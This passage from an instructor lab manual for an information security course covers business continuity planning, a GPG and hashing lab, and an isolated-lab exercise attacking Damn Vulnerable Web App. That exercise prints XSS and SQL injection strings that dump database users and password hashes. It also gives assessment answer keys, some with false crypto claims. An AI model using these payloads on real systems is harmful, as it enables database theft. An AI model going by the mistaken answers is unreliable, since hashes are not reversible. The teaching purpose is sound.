Updating i. BCP Maintenance & On-Going Management 10. Review the elements of a BCP implementation plan a. Initiating the BCP b. Back-Up and Recovery Procedures for IT Systems, Applications, & Data c. Key BCP Personnel and Organizational Structure d. Prepare Key Documents, Tools, and Instructions for Recovery e. Handling Emergencies or Disaster Recovery Situations f. Manage Business Recovery g. Perform Business Recovery Steps h. Test the BCP i. Train IT and Departmental Personnel on Business Recovery and Back-Up Procedures j. Maintain and Update the BCP Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -76- IT255 Instructor Lab Manual LABORATORY Deliverables Upon completion of this paper-based lab, students are required to submit the following deliverables: 1. Lab #6 Completed Business Recovery Strategy Assessment Spreadsheet 2. Lab #6 Create a BCP Plan Outline and Implementation Plan Outline for the Fictitious Organization 3. Lab #6 Lab Assessment Questions & Answers Evaluation Criteria and Rubrics The following are the evaluation criteria and rubrics for Lab #6 - Perform Business Continuity Plan Implementation Planning: 1. Was the student able to identify the major elements of a Business Continuity Plan (BCP) and requirements for a fictitious organization? [20%] 2. Was the student able to perform a high-level Business Impact Analysis (BIA) and Risk Analysis (RA) for a fictitious organization? [20%] 3. Was the student able to prioritize from the BIA and RA business functions and processes that must be part of the business continuity plan? [20%] 4. Was the student able to craft a BCP plan outline that addresses the BIA and RA and business priorities? [20%] 5. Was the student able to define the necessary BCP implementation planning steps that include testing, practice, and documentation of back-up and recovery procedures [20%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -77- IT255 Instructor Lab Manual LABORATORY Lab #6 Business Recovery Strategy Assessment Spreadsheet e-Commerce/e-Business Organization List of Key Business Functions & Processes E-commerce processes primary revenue source for the organization E-mail based communications internal for business communications and external for customer service Telephone call center and on-line customer services enhanced e-customer service delivery with call center and self-service customer website Manufacturing and production line just in time inventory and distribution of products Production processes just in time manufacturing and integrated supply chain Quality control mechanisms maximize product quality Maintenance and support services keep production lines open Sales and sales administration inside sales, online sales, sales support, resellers and distributors, etc. Finance and accounting G/L, A/R, A/P, Payroll, Benefits Research and development activities product development Human resources management employee services Information technology services & Internet connectivity supports e-commerce and e-business infrastructure Premises (Head Office and branches) headquarters facility and administration office Marketing and public relations internet marketing and branding Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -78- IT255 Instructor Lab Manual LABORATORY Lab #6 Business Recovery Strategy Assessment Spreadsheet e-Commerce/e-Business Organization List of Impacted IT Systems, Applications, & Data Business Function or Process Priority E-mail based communications Website and e-commerce website (Payroll for HR) Telephone call center Customer service Manufacturing and production line Production processes Quality control mechanisms Maintenance and support services Sales and sales administration Finance and accounting Research and development activities Human resources management Information technology services 3 4 7 8 12 14 6 9 17 15 2 Internet connectivity & telephone service Premises (Head Office and branches) Marketing and public relations 5 13 16 Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. 10 1 IT Systems, Applications & Data POP3, SMTP Mail Servers Web Server, e-Commerce Server, (Manual Payroll Processing or External) VoIP Telephony Infrastructure Customer Server System / CRM Automation System & Manufacturing Production Scheduling System QC System Maintenance & Support System Sales Order Entry, Sales Support GL, A/R, A/P Accounting System R&D System HR, Employment, Benefits 7-Domains of Typical IT Infrastructure (Website/Internet/Online) Broadband Internet, VoIP System HQ LAN/VoIP/IT Infrastructure Marketing Analysis System Current Version Date: 12/06/2010 -79- IT255 Instructor Lab Manual LABORATORY Lab #6 Assessment Worksheet Perform Business Continuity Plan Implementation Planning Course Name & Number: ______________________________________________________________ Student Name: _______________________________________________________________________ Instructor Name: _____________________________________________________________________ LAB Due Date: _______________________________________________________________________ Overview The instructor will lead the class in discussions pertaining to a business continuity plan. Key elements of a business continuity plan starting with a risk analysis, business impact analysis, and alignment of critical business functions and processes will be discussed. Students will craft a business continuity implementation plan outline as part of this labs deliverables. Lab Assessment Questions & Answers 1. What is the different between a risk analysis (RA) and a business impact analysis (BIA)? A risk analysis (RA) focuses on all aspects of risk assessment for an organization and is a necessary step to assess what kind and how much business insurance to obtain. A business impact analysis (BIA) focuses on identifying critical business functions and operations that must be part of a business continuity plan to maintain and maximize availability. 2. What is the difference between a Disaster Recovery Plan and a Business Continuity Plan? A DRP is usually a subset of a BCP and defines how an organization is to handle major disasters or major outages and emergency situations. When a disaster situation is declared, the DRP is enacted not the BCP to handle and deal with the immediate emergency situation and handle the disaster situation as per the DRP procedures. A DRP deals with the immediate disaster situation and must achieve the RTO as defined in the BCP, usually in an alternate site or triage to restore immediate critical business functions and operations. 3. Typically, a business continuity plan is also a compilation or collection of other plans. What other plans might a BCP and all supporting documents include? Disaster recovery plan Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -80- IT255 Instructor Lab Manual LABORATORY End-user recovery plan Contingency plan Emergency response plan Crisis management plan IT System recovery procedures (i.e., mission critical IT systems, applications, and data, VoIP / telephony infrastructure, Internet access, etc.) 4. What is the main difference between a Disaster Recovery Plan (DRP) and a Business Continuity Plan (BCP)? A Disaster Recovery Plan (DRP) focuses on the recovery of IT systems, applications, and data in the event of a catastrophic disruption (fire) or disaster (hurricane) and a major IT or data center outage occurs (physical damage or destruction). The immediate concern of a DRP is to bring up mission critical systems, applications, and data access as soon as possible, even if its a temporary or short-term solution while the rest of the Business Continuity Plan (BCP) kicks in. A BCP has a much broader scope and takes into account all business functions and processes from the prioritization dictated by the BIA. 5. What is the purpose of a risk assessment and business impact analysis? Why is this an important first step in defining a BCP and DRP? The purpose of a risk assessment (RA) is to identify the entire organizations risks and quantify the impact of the identified risks to the organization based on key business drivers (loss of life, loss of income, liability, exposure, etc.). The purpose of a business impact analysis (BIA) is to assess the impact of downtime for specific business functions or processes. The BIA prioritizes mission critical business functions and processes (i.e., sales, customer service, manufacturing, e-commerce website, etc.) such that the recovery priorities for IT systems, applications, and data were affected by an outage or downtime. 6. How does risk assessment (RA) relate to a business impact analysis for an organization? The BIA is like conducting a risk assessment except that it is focused on identifying critical, major, and minor business functions and operations. Once you identify these business functions and operations, you must then prioritize them in terms of importance to maintaining operations. Thus, a BIA is a form of risk management and risk assessment because you are assessing and minimizing the risk associated with downtime or unavailable IT systems, applications, and resources. The BIA helps organizations mitigate Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -81- IT255 Instructor Lab Manual LABORATORY the risk associated with downtime and unavailable IT resources for business continuity and disaster recovery of critical business functions and operations. 7. Given the list of identified mission critical business functions and processes, what kind of company would you say this organization is, and what do you think are its most important business processes and functions? This organization is in the production manufacturing business heavily dependent upon a supply chain infrastructure for just in time manufacturing and inventorying. The crux of this organization is based on its online sales through an e-commerce website and a sales support function to drive revenue and cash into the business. This type of business is heavily dependent upon maintaining its connection with its customers, in this case, online through the Internet supported by traditional sales through inside and outside sales professionals. Maintaining enhanced customer service delivery for both high-value customers (VIP) and low-value customers is critical to maximize customer retention and repeat purchases. 8. Given the prioritization list provided for the organizations identified business functions and processes, write an assessment of how this prioritization will impact the need for IT systems, applications, and data access. The assessment should focus on revenue generation and minimization of loss of income. Coupled with that is the need for maintaining customer service delivery whether online, e-mail, self-service on website, or via 800-number with call center. The customer is king to this organization and maximizing revenue and income supported by customer service delivery is what is driving this prioritization. 9. For the top 5 identified business functions and processes, what recovery time objective (RTO) would you recommend for this organization and why? RTO - 8 hours or 1 business day. Given the real-time nature of this organization and real-time online transactions and purchases, providing real-time customer service support and product shipping logistics is critical to this organization. While portions of the identified #1 - #5 business functions and processes can be supported with minimal IT infrastructure, it would be important to identify the minimum IT systems, applications, and data access needed to support the online, e-commerce system, customer service functions, and access to the customer relationship management (CRM) database. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -82- IT255 Instructor Lab Manual LABORATORY 10. Why is payroll for employees and Human Resources listed as a co-number 1 business priority? It has a critical business priority to pay its employees on time and on schedule. Many businesses and organizations use an external payroll and direct deposit function to keep its employees paid and happy no matter what the circumstances are within the business or organization. It is also a breach of contract or employment to not pay your employees when pay is due, so it would be imperative to ensure continuity with payroll for its employees. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -83- IT255 Instructor Lab Manual LABORATORY Laboratory #7 Lab #7: Relate Windows Encryption and Hashing to Confidentiality & Integrity Learning Objectives and Outcomes Upon completing this lab, students will be able to: Apply the concepts of using common cryptographic and encryption techniques to ensure confidentiality Apply the concepts of hashing to ensure integrity of data transmission and data reception Identify the output of common cryptographic and hashing tools on transmitted data and verity confidentiality and integrity Implement an MD5 sum or SHA1 hash on a data transmission or message to verify data transmission integrity Implement GPG for Windows to encrypt a data message to ensure confidentiality Required Setup and Tools This lab does not require the use of the ISS Mock IT Infrastructure - Cisco core backbone network. In addition, the Instructor VM workstation and Student VM workstations should be physically disconnected from the ITT internal network and be isolated on a dedicated layer 2 switch. This will allow for a shared DHCP server to be used to allocate the IP addresses for the instructor and student workstations. The following is required for this hands-on lab: A) A classroom workstation (with at least 4 Gig RAM) capable of supporting an insert-able hard drive or USB hard drive with a pre-configured, virtualized server farm. This classroom workstation will support the virtualized server farm connected to the classroom layer 2 switch B) An instructor workstation (with at least 2 Gig RAM) that shall act as the Instructors demo LAB workstation. The instructor will display the Instructor workstation on the LCD projector to demo the loading and configuring of the Instructor VM Workstation and VM Server Farm with VMware Player C) Students LAB workstations will enable their own Student VM and VM Server Farm to run the Target VMs The following summarizes the setup, configuration, and equipment needed to perform Lab #7: 1. The VM server farm with: Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -84- IT255 Instructor Lab Manual LABORATORY a. The Microsoft WindowsDHCP01 VM server enabled for allocating student IP host addresses b. The Instructor VM for the instructor and the Student VM for the students 2. Target VMs as described by the Lab: a. Windows 2003 Server TargetWindows01 VM server b. Instructor and Student VM with GPG installed 3. Standard ITT onsite student workstation must have the following software applications loaded to perform this lab: a. VMware Player 3.x b. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers Recommended Procedures Instructor Demo Lab #7: The instructor will demonstrate common hashing and encryption tools including MD5, SHA1, Hash Modifications and the open-source GPG encryption tool. Using the new Instructor VM workstation and TargetWindows01 VM server, the Instructor will demonstrate the following: Execute the MD5 and SHA1 encryption and hashing tools on the WindowsTarget01 VM server to generate a unique hash for a sample file Modify the sample file and then run the MD5 and SHA1 encryption and hashing tools against the new file showing what happens to the cryptographic hash value Verify the integrity of the sample file has been altered give the new MD5 and SHA1 hash that was calculated for the altered sample file Execute the GPG encryption / decryption application and apply to a secret message and verify creation and sharing of public and private keys Hands-on Lab #7 Instructor Steps: The instructor will provide the following demonstration using the Instructor VM workstation and the TargetWindows01 VM server in this hands-on lab. This VM can be pre-loaded into VMware Player along with the Instructor VM workstation or Student VM workstation and can fit within 2 Gig RAM with both VMs powered on. 1. Connect the instructor-removable hard drive to your workstation 2. Boot up the Instructor VM and Microsoft DHCP VM server to allocate an IP host address 3. Connect the Instructor VM workstation to the LCD overhead projector for classroom display Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -85- IT255 Instructor Lab Manual LABORATORY 4. Enable your DOS command prompt and type ipconfig and ping your allocated IP host address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1 5. Login to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch: Login ID: instructor or student (case sensitive) Password: ISS316Security (case sensitive) NOTE: If the workstations in your physical classroom have only 2GB of RAM then only two VMs can be powered-on at once. You can load your Instructor VM and the TargetWindows01 VM server simultaneously. Obtain an IP host address from the DHCP server connected to the same layer 2 classroom switch to maximize performance. 6. Power-up in VMware Player, the TargetWindows01 VM server and logon using the provided credentials: Windows 2003 Server Standard Edition Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01) o Computer Name: Windows02 o Three Users Available: administrator, instructor or student (case sensitive) o Password: ISS316Security o IP Address: DHCP o Domain Login: NO FTP (Filezilla FTP Server) o Port: 21 o Username: instructor or student o Password: TFTP (Tftpd32 TFTP Server) o Port: 69 o Username: o Password: 7. GPG should already be pre-installed and located on the desktop of the Instructor VM workstation and the TargetWindows01 VM server Note: If GPG is not on your desktop, look inside your \vlabs folder on the c:\ drive for the GPG install file. Install the GPG application with all the default installation configuration values. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -86- IT255 Instructor Lab Manual LABORATORY 8. Click on the GPG desktop icon to create your private key (Screen #1) 9. Insert the name Instructor or Student as the name asked for. And click Forward 10. To create a unique private key, insert your individual email address, (student01@vlabsolutions.com) and click Forward 11. Create a backup copy of your new key when prompted and click Forward 12. Enter a passphrase to further encrypt your newly created key (this is your secret key). Write down this passphrase as it will be what needs to be used to decrypt and encrypt messages 13. After generation of your key, save it to the desktop for quick access 14. Click on close and now open up GPG again. Highlight the key you just created, and click on the export option and name the key InstructorVM or StudentVM as appropriate 15. Repeat steps above to create a public key for the TargetWindow01 VM. 16. Click on the TargetWinVM01 key, and click on the export option and name the key TargetVM01 17. Transfer both sets of keys to each of the VMs by copying, cutting, and pasting or use an external USB hard drive to ensure the public keys are transferred to both the Instructor VM and the TargetWindows01 VM server 18. Use the GPG import button, and import the public keys to both VMs 19. On the Instructor VM or Student VM right, click newly imported key, and click on Set Owner Trust option, and set it to Full in the options selection 20. On the Student VM right click newly imported key, and click on Sign Keys option, and enter your secret key passphrase from generation earlier to sign the public key to your secret key ring as authorized 21. For Hashing we can verify the public key was imported correctly into both the Instructor VM workstation and the TargetWindows01 VM server. Integrity is maintained if the hash value matches the Fingerprint in the GPG home window 22. On the Instructor VM, create a new file on the desktop using notepad and name the file IT255 Lab #7.txt, and add a message in the text file I like information systems security 23. Save the IT255 Lab #7.txt file, and right click, and chose the Sign and Encrypt option. Ensure you check the Remove Unencrypted File option at the bottom (Refer to Screen #3) 24. Add both certificates (keys) to the Options and click Encrypt! (Refer to Screen #4) 25. Once encrypted, you will see the encrypted file replace the plain text file on the desktop, right click and choose decrypt/verify option (Refer to Screen #5) Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -87- IT255 Instructor Lab Manual LABORATORY 26. Now transfer the encrypted file to the TargetWindows01 VM server desktop and perform the similar steps from Step #22 - #25 to decrypt (not encrypt) the file just received on TargetWindows01 VM server Hands-on Lab #7 Student Steps: To perform this hands-on lab, students are required to perform the following steps: 1. Connect the student-removable hard drive to your workstation 2. Boot up the Student VM and Microsoft DHCP VM server to allocate an IP host address 3. Connect the Student VM workstation to the LCD overhead projector for classroom display 4. Enable your DOS command prompt and type ipconfig and ping your allocated IP host address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1 5. Login to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch: Login ID: student (case sensitive) Password: ISS316Security (case sensitive) NOTE: If the workstations in your physical classroom have only 2GB of RAM then only two VMs can be powered-on at once. You can load your Instructor VM and the TargetWindows01 VM server simultaneously. Obtain an IP host address from the DHCP server connected to the same layer 2 classroom switch to maximize performance. 6. Power-up in VMware Player, the TargetWindows01 VM server and logon using the provided credentials: Windows 2003 Server Standard Edition Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01) o Computer Name: Windows02 o Three Users Available: administrator, instructor or student (case sensitive) o Password: ISS316Security o IP Address: DHCP o Domain Login: NO FTP (Filezilla FTP Server) o Port: 21 o Username: instructor or student o Password: TFTP (Tftpd32 TFTP Server) Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -88- IT255 Instructor Lab Manual o o o LABORATORY Port: 69 Username: Password: 7. GPG should already be pre-installed and located on the desktop of the Instructor VM workstation and the TargetWindows01 VM server Note: If GPG is not on your desktop, look inside your \vlabs folder on the c:\ drive for the GPG install file. Install the GPG application with all the default installation configuration values. 8. Click on the GPG desktop icon to create your private key (Screen #1) 9. Insert the name Student as the name asked for. And click Forward 10. To create a unique private key, insert your individual email address, (student01@vlabsolutions.com) and click Forward 11. Create a backup copy of your new key when prompted and click Forward 12. Enter a passphrase to further encrypt your newly created key (this is your secret key). Write down this passphrase as it will be what needs to be used to decrypt and encrypt messages 13. After generation of your key, save it to the desktop for quick access 14. Click on close, and now open up GPG again. Highlight the key you just created, and click on the export option and name the key StudentVM as appropriate 15. Repeat Steps #10#14 to create a public key for the TargetWindow01 VM. 16. Click on the TargetWinVM01 key, and click on the export option and name the key TargetVM01 17. Transfer both sets of keys to each of the VMs by copying, cutting, and pasting or use an external USB hard drive to ensure the public keys are transferred to both the Student VM and the TargetWindows01 VM server 18. Use the GPG import button, and import the public keys to both VMs 19. On the Student VM right click newly imported key, and click on Set Owner Trust option, and set it to Full in the options selection 20. On the Student VM, right click newly imported key, and click on Sign Keys option, and enter your secret key passphrase from generation earlier to sign the public key to your secret key ring as authorized Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -89- IT255 Instructor Lab Manual LABORATORY 21. For Hashing, we can verify the public key was imported correctly into both the Student VM workstation and the TargetWindows01 VM server. Integrity is maintained if the hash value matches the Fingerprint in the GPG home window 22. On the Student VM, create a new file on the desktop using notepad, and name the file IT255 Lab #7.txt, and add a message in the text file I like information systems security 23. Save the IT255 Lab #7.txt file and right click, and chose the Sign and Encrypt option. Make sure you check the Remove Unencrypted File option at the bottom (Refer to Screen #3) 24. Add both certificates (keys) to the Options and click Encrypt! (Refer to Screen #4) 25. Once encrypted, you will see the encrypted file replace the plain text file on the desktop, right click and choose decrypt/verify option (Refer to Screen #5) 26. Now transfer the encrypted file to the TargetWindows01 VM server desktop, and perform the similar steps from Steps #22 #25 to decrypt (not encrypt) the file just received on TargetWindows01 VM server Deliverables Upon completion of this lab, students are required to provide the following deliverables: 1. Lab #7 Your original GPG encrypted message and decrypted message 2. Lab #7 Your Hash value for the hashed file 3. Lab #7 Lab Assessment Questions & Answers Evaluation Criteria and Rubrics The following are the evaluation criteria and rubrics for Lab #7: Relate Windows Encryption and Hashing to Confidentiality & Integrity: 1. Was the student able to apply the concepts of using common cryptographic and encryption techniques to ensure confidentiality? [20%] 2. Was the student able to apply the concepts of hashing to ensure integrity of data transmission and data reception? [20%] 3. Was the student able to identify the output of common cryptographic and hashing tools on transmitted data and verity confidentiality and integrity? [20%] 4. Was the student able to implement an MD5 sum or SHA1 hash on a data transmission or message to verify data transmission integrity? [20%] 5. Was the student able to implement GPG for Windows to encrypt a data message to ensure confidentiality? [20%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -90- IT255 Instructor Lab Manual LABORATORY Lab #7 Assessment Worksheet Relate Windows Encryption and Hashing to Confidentiality & Integrity Course Name & Number: ______________________________________________________________ Student Name: _______________________________________________________________________ Instructor Name: _____________________________________________________________________ LAB Due Date: _______________________________________________________________________ Overview This lab demonstrates how hashing tools can be used to ensure message and file transfer integrity and how encryption can be used to maximize confidentiality. Common hashing and encryption tools including MD5, SHA1, and GnuPG will be used. The students will engage in hashing exercises to demonstrate message and file integrity using both MD5 and SHA1 on their Student VM and TargetWindows01 VM server desktop. They will execute the MD5 and SHA1 hashing tools on their Student VM desktop on a sample file comparing the hash value when the sample file is modified or altered. They will then load GnuPG to generate both a public and private key and a secret key for encryption only. The students will share public keys and the secret keys in order to send secure messages and files from the Student VM to the TargetWindows01 VM server. LAB Assessment Questions & Answers 1. Which Key do you provide anyone you want to encrypt messages with private or public keys or both? Public key only should be needed. Your private key is encrypted but should still never be given away. 2. What does GPG allow you to do once it is installed? GPG allows you to encrypt messages, files, and text using a private key that allows trusted users to decrypt if you give them your public key. 3. Name 2 different types of encryption supported by GPG for your key? DSA and RSA of different varying encryption bits up to 4096 Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -91- IT255 Instructor Lab Manual LABORATORY 4. What happens when you sign and trust a new key to your keychain? You are able to decrypt messages for the users key you imported and signed as trusted. 5. If a user sends you his public key will he be able to decrypt your encrypted messages once you import and sign his key? No, you must provide your public key to any user wanting to decrypt any encrypted message by you. 6. What are the similarities between an MD5 hash and a fingerprint? Both use a mathematical function that converts a file into a smaller unique datum that can be checked for integrity. 7. How would you encrypt a webserver and the pages it serves up? Using SSL certificates so that clients can login and view the certificate and trust it to encrypt the transmissions 8. Why is hashing all database inputs not considered encryption of the database? What value does hashing database entries from server to client? Hashing is a unique mathematical equation done in case integrity is called into question. This equation can be reversed if the correct algorithm is used. Encryption will not allow any possible solution without the public or private key knowledge or information, GPG is an example of encryption. Hashing verifies the integrity of the data when received at the destination. 9. Where would you remove a users certificate from being able to access systems on your network? You would revoke the certificate for the users in the CRL, Certificate Revocation List, which would pull from the CA, Certificate Authority. 10. Which connection type is secure and which is clear text between SSH, Telnet and FTP? SSH uses public keys and is the only one of the 3 listed which encrypts the communications. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -92- IT255 Instructor Lab Manual LABORATORY Laboratory #8 Lab #8: Perform a Website & Database Attack by Exploiting Identified Vulnerabilities Learning Objectives and Outcomes Upon completing this lab, students will be able to complete the following tasks: Identify web application and web server backend database vulnerabilities as viable attack vectors Develop an attack plan to compromise and exploit a web site using cross-site scripting (XSS) against sample vulnerable web applications Conduct a manual Cross-site Scripting (XSS) attack against sample vulnerable web applications Perform SQL injection attacks against sample vulnerable web applications with e-commerce data entry fields Mitigate known web application and web server vulnerabilities with security countermeasures to eliminate risk from compromise and exploitation Required Setup and Tools This lab does not require the use of the ISS Mock IT Infrastructure - Cisco core backbone network. In addition, the Instructor VM workstation and Student VM workstations should be physically disconnected from the ITT internal network and be isolated on a dedicated layer 2 switch. This will allow for a shared DHCP server to be used to allocate the IP addresses for the instructor and student workstations. The following is required for this hands-on lab: A) NOT NEEDED - A classroom workstation/server (with at least 4 Gig RAM) capable of supporting the removable hard drive with the VM server farm. B) An instructor workstation/server (with at least 2 Gig RAM/4Gig RAM recommended) that shall act as the Instructors test bed for performing the demo lab. The instructor will power-on the WindowsDHCP01 VM server, the TargetUbuntu01 Linux VM server, and the Instructor VM workstation using VMware Player. C) Students Lab workstations will use their own VM server farm and VM student workstation. VMware Player will be used to run the Student VM and the Target VM. The following summarizes the setup, configuration, and equipment needed to perform Lab #8: 1. A Virtualized Server Farm with: a. Microsoft DHCP server for allocating student IP host addresses Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -93- IT255 Instructor Lab Manual LABORATORY b. Instructor VM workstation 2. Target VMs as described by the Lab: Ubuntu Linux 10.04 LTS Server (VM Name: TargetUbuntu01) o Computer Name: Ubuntu01 o ONE User available ONLY: administrator o Password: ISS316Security (case sensitive) o IP Address: eth0 set to DHCP, eth1 and eth2 not set. SSH o Port: 21 o Username: administrator o Password: Apache running Damn Vulnerable Web App (DVWA) o URL: http:///dvwa o Username: admin o Password: password 3. Standard ITT ISS onsite student workstation must have the following software applications loaded to perform this Lab: a. VMware Player b. Web Browser (Internet Explorer) c. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers Recommended Procedures Instructor Demo Lab #8: The instructor will perform a demonstration of an XSS exploit and an SQL Injection attack on the TargetUbuntu01 Linux VM server running the Damn Vulnerable Web App (DVWA) on an Apache Web Server. The instructor VM workstation and student VM workstations should be connected to the same layer 2 switch for DHCP purposes so that students do not have to enable their local DHCP server given memory constraints. The instructor will enable the TargetUbuntu01 Linux VM server. The instructor will demonstrate how to perform a Cross-site Scripting attack and an SQL injection attack on the DVWA web server acting as the test bed for attack strings and commands to be entered by the penetration tester. Mitigation solutions will be identified for the software vulnerabilities that were exploited. Hands-on Lab #8 Instructor Steps: The instructor will perform the following demonstration using VMware Player: Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -94- IT255 Instructor Lab Manual LABORATORY 1. Connect the Instructor removable hard drive to the dedicated Instructor workstation. 2. Power-up and log into your Instructor VM, TargetUbuntu01 VM, and the Microsoft Windows DHCP Server VM for an IP address. Note: Remember if you only have 2 Gig RAM, you may have to turn on your VMs one at a time to maximize performance. Once you and the students and the TargetUbuntu01 Linux VM servers have obtained an IP address, you can power-off the WindowsDHCP01 Server VM. Now you perform the web application and web server attacks on the TargetUbuntu01 Linux VM server using the Instructor VM workstation. 3. Connect the LCD projector to the Instructor workstation and project onto the screen for students to view your demo. 4. Log into the TargetUbuntu01 Linux VM server and verify that it has received an IP address by typing: $ sudo ifconfig a 5. If it has an IP host address, then connect to it using your Instructor VM workstations Internet Explorer browser: http://targetubuntu01 IP host /dvwa 6. If it has not obtained an IP address, verify which eth is being detected by the VM? i.e. eth0, eth1, eth2, etc? This information is provided in the ifconfig commands output. 7. To set a static IP or to set a non-standard eth interface to DHCP on Ubuntu follow these steps: a. $ sudo nano /etc/network/interfaces b. Once the nano editor comes up enter the following entry for your particular eth interface (insert the eth# that is displayed as enabled on your VM it may not be eth0, eth1, eth2, etc.): i. auto lo eth0 iface lo inet loopback iface eth0 inet static address 172.30.0.xxx(xxx= your static ip host address) netmask 255.255.255.0 (enter the /24 netmask) gateway 172.30.0.1 (enter the IP default gateway ip here) Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -95- IT255 Instructor Lab Manual LABORATORY c. For DHCP enter the following: i. auto lo eth0 iface lo inet loopback iface eth0 inet dynamic d. Save and exit by hitting CTRL+X on the keyboard and Y to save the file. e. Type the following to restart: $ sudo /etc/init.d/networking restart To Exploit a Cross-site Scripting (XSS) Vulnerability in DVWA perform the following: 1. Exploit a cross site scripting vulnerability to cause a message to appear on a users screen. 2. Provide a screen shot or description of the attack 3. With TargetUbuntu01 enabled, you need to open your Internet Explorer browser to connect to the web site: http://172.30.0.x/dvwa, where x is the IP host address allocated by the DHCP server o o o URL: http:///dvwa Username: admin Password: password 4. Once the web page comes up, login and click on the DVWA Security tab and set it to low. 5. Click on the XSS Reflective tab which will display our vulnerable web application test Reflective Cross Site Scripting against the web site. 6. Try to insert in the provided input box the following: See the output there. This indeed shows that we can further send scripts through the validation box provided. 7. Reflective XSS is the application when enabled can create alerts and pop-ups. To further test the XSS vulnerability please insert the following: alert(vuln); Hello! To Exploit an SQL Injection Vulnerability in DVWA perform the following: 1. Exploit an SQL injection vulnerability by injecting SQL commands into the applications data entry fields and provide a screen shot or output of the attack Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -96- IT255 Instructor Lab Manual LABORATORY 2. Power up the TargetUbuntu01 Linux VM server and using your Instructor workstations Internet Explorer, open a web browser as follows: http://172.30.0.x/dvwa, where x is the IP host addresses that was applied to the TargetUbuntu01 Linux VM server. 3. Once the DVWA page comes up, login and click on the DVWA Security tab and set it to low. 4. Click on the SQL Injection tab which will provide a vulnerable web app to test SQL injections against the back-end database. 5. We will try OMalley as we want to see if the field populates and any anomalies or errors. Did any character get recognized before our error? 6. We see from here that we can interrupt and possibly debug information using a different SQL injection. Lets try actually passing an SQL statement, try: a OR x=x;# 7. Familiar statement to the infamous: a OR 1&1 # 8. Several other combinations should also work so lets try some. NOTE: These strings are in clear text, you should check your web server logs specifically on Declare statements to know whether or not databases are being injected. You can verify from these logs if the database has been injected. Obfuscation by using hexadecimal character strings is also commonly used. 9. DB Enumeration: a ORDER BY 1;# not too different should show the login screen showing that it recognized the command, try 2 then 3 notice the difference between all 3 is 3 is not recognized as a value and the error relates to columns. Now we know we can start using Union Statements. 10. Try: a OR firstname IS NULL;# Do you see the error? 11. Now try: a OR first_name IS NULL;# Do you see the difference? The screen came back just like with our ORDER BY statement earlier. 12. Try: a' OR database() LIKE 'DB';# This command searches for a possible hit on the DBs characters. Adding a % splits different fields to query. 13. Try: a OR database() LIKE d%;# notice the output? 14. Try: a' UNION SELECT table_schema, table_name FROM information_Schema.tables;# Results in all Table and Column names as being used. 15. Try: a' UNION ALL SELECT 1, @@version;# That will give you some information on the version info for the SQL server. 16. Try: a' UNION ALL SELECT system_user(),user();# This will tell you the user you are making queries under from the web app. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -97- IT255 Instructor Lab Manual LABORATORY 17. Try: a' UNION ALL SELECT user, password FROM mysql.user;# priv;#' At this point you have a hash for a user to the backend DB. 18.We will check for injection at this time by issuing: 'UNION SELECT 'test', '123' INTO OUTFILE 'testing1.txt At this point we know we have a user, and we know the DB can be written to. We have users, user IDs, table and column information and an inject able database. Hands-on Lab #8 Student Steps: Students should perform the following steps: 1. Connect your removable hard drive to your ITT student workstation and logon using GUEST credentials. Note: wait for the Instructor to disconnect the classroom workstations from the ITT internal network and live Internet prior to booting up your student VM workstation to obtain an IP host address from the DHCP server . 2. Using VMware Player, power-up your student VM workstation and obtain an IP host address from the WindowsDHCP01 server. 3. Using VMware Player, power-up your TargetUbuntu01 Linux VM server and obtain an IP host address from the WindowsDHCP01 server. Note: If you only have 2 Gig RAM, you may want to put static IP address configurations in your Student VM workstation and TargetUbuntu01 Linux VM server so you dont have to power-on the WindowsDHCP01 VM server. Once you have valid IP host addresses and can ping each other (Student VM and TargetUbuntu01 Linux VM, you can now perform the web application and web server attacks on the TargetUbuntu01 Linux VM server. 4. Log into the TargetUbuntu01 Linux VM server and verify that it has received an 